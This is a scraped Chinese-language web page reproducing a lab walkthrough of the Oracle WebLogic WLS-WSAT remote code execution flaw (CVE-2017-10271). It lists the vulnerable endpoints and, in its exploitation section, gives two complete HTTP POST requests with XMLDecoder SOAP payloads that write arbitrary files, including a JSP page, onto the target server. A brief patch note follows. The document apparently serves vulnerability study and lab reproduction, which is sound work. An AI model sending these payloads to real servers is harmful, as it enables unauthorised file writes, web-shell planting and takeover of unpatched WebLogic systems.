当前位置: 首页 > news >正文

无为建设局网站移动端网站开发环境

无为建设局网站,移动端网站开发环境,保险公司官网,wordpress网站维护插件Oracle WebLogic Server WebLogic WLS组件远程命令执行漏洞 CVE-2017-10271 已亲自复现 漏洞名称漏洞描述影响版本 漏洞复现环境搭建漏洞利用 修复建议 漏洞名称 漏洞描述 在Oracle WebLogic Server 10.3.6.0.0/12.1.3.0.3/2.2.1/1.10/12.2.1.1/22.0#xff08;Application … Oracle WebLogic Server WebLogic WLS组件远程命令执行漏洞 CVE-2017-10271 已亲自复现 漏洞名称漏洞描述影响版本 漏洞复现环境搭建漏洞利用 修复建议 漏洞名称 漏洞描述 在Oracle WebLogic Server 10.3.6.0.0/12.1.3.0.3/2.2.1/1.10/12.2.1.1/22.0Application Server Soft ware中发现了一个被归类为非常严重的漏洞。这会影响组件WLS Security的未知代码。 影响版本 Oracle Weblogic_Server 12.2.1.1.0 Oracle Weblogic_Server 10.3.6.0.0 Oracle Weblogic_Server 12.1.3.0.0 Oracle Weblogic_Server 12.2.1.2.0 漏洞复现 环境搭建 受害者IP192.168.63.129:53342 攻击者IP192.168.63.1 vulfocus下载链接 https://github.com/fofapro/vulfocus git clone https://github.com/fofapro/vulfocus.git启动vulfocus docker-compose up -d 环境启动后访问http://192.168.63.129:53342即可看到一个404页面说明已成功启动。 漏洞的URL /wls-wsat/CoordinatorPortType /wls-wsat/RegistrationPortTypeRPC /wls-wsat/ParticipantPortType /wls-wsat/RegistrationRequesterPortType /wls-wsat/CoordinatorPortType11 /wls-wsat/RegistrationPortTypeRPC11 /wls-wsat/ParticipantPortType11 /wls-wsat/RegistrationRequesterPortType1访问路径/wls-wsat/CoordinatorPortType,出现下图所示页面说明可能存在漏洞。 漏洞利用 上传test.txt文件尝试一下 POST /wls-wsat/CoordinatorPortType HTTP/1.1 Host: 192.168.63.129:57677 Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) Connection: close Content-Type: text/xml Content-Length: 677soapenv:Envelope xmlns:soapenvhttp://schemas.xmlsoap.org/soap/envelope/soapenv:Headerwork:WorkContext xmlns:workhttp://bea.com/2004/06/soap/workarea/java version1.6.0 classjava.beans.XMLDecoderobject classjava.io.PrintWriterstringservers/AdminServer/tmp/_WL_internal/wls-wsat/54p17w/war/test.txt/stringvoid methodprintlnstringxmldecoder_vul_test/string/voidvoid methodclose//object/java/work:WorkContext/soapenv:Headersoapenv:Body/ /soapenv:Envelope访问URLhttp://192.168.63.129:57677/wls-wsat/test.txt 上传test.jsp尝试一下 POST /wls-wsat/CoordinatorPortType HTTP/1.1 Host: 192.168.63.129:57677 Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) Connection: close Content-Type: text/xml Content-Length: 677soapenv:Envelope xmlns:soapenvhttp://schemas.xmlsoap.org/soap/envelope/soapenv:Headerwork:WorkContext xmlns:workhttp://bea.com/2004/06/soap/workarea/java version1.6.0 classjava.beans.XMLDecoderobject classjava.io.PrintWriterstringservers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war/test.jsp/stringvoid methodprintlnstring![CDATA[ % out.print(test); % ]]/string/voidvoid methodclose//object/java/work:WorkContext/soapenv:Headersoapenv:Body/ /soapenv:Envelope访问路径http://192.168.63.129:57677/bea_wls_internal/test.jsp 修复建议 目前官方已有可更新版本建议受影响用户升级至最新版本。 补丁链接http://www.oracle.com/technetwork/security-advisory/cpuoct2017-3236626.html
http://www.yutouwan.com/news/361304/

相关文章:

  • 网站开发持续更新建e网室内
  • 怎么样看网站用什么程序做的南通优化网站收费标准
  • 英文网站建设需要准备什么如何做好网站建设
  • wordpress 搜索模板网站优化模板
  • vue可以做pc的网站wordpress菜单文本
  • 佛山网站建设技术外包珠海市住房和城乡建设部网站
  • 网站竞价难做优化北京网络公司的网站
  • 列表怎么做网站佛山市房产信息网
  • 怎样优化手机网站程序员用什么软件
  • 广州网站设计成功柚米科技开发公司装饰装修合同范本简单
  • 昆山科技网站建设软件开发者简称
  • 古香古色网站模板开一家互联网公司需要多少钱
  • 网站设计基本原则网站设计文献
  • 科技公司网站开发有的网站为什么打不开怎么回事
  • 哪些做直播卖食品的网站找客网怎么样
  • 如何做充值网站wordpress restfulapi
  • 做ui的网站有哪些青岛建站模板厂家
  • 做网站用哪个软件写比较好网上做预算有哪些网站
  • 莱州网络建站网站中加入百度地图
  • 做网站设计需要学什么flask做网站
  • 企业做网站公司哪家好大连网站建设招聘网
  • 去年做啥网站能致富电子商务网站开发与设计报告
  • 网站如何做浮窗东莞网站设计建设公司
  • 网站毕设给个网址兄弟
  • 网站维护怎么样哪个网站兼职做设计比较好
  • 网站建设网站建设的网络公司做程序界面的网站
  • 网站建设与规划方向织梦网站优化
  • 在北京建设教育协会的网站自定义wordpress登陆页面
  • 怎么删除织梦做的网站做网站代码的含义
  • 网站建设合优百度在线搜索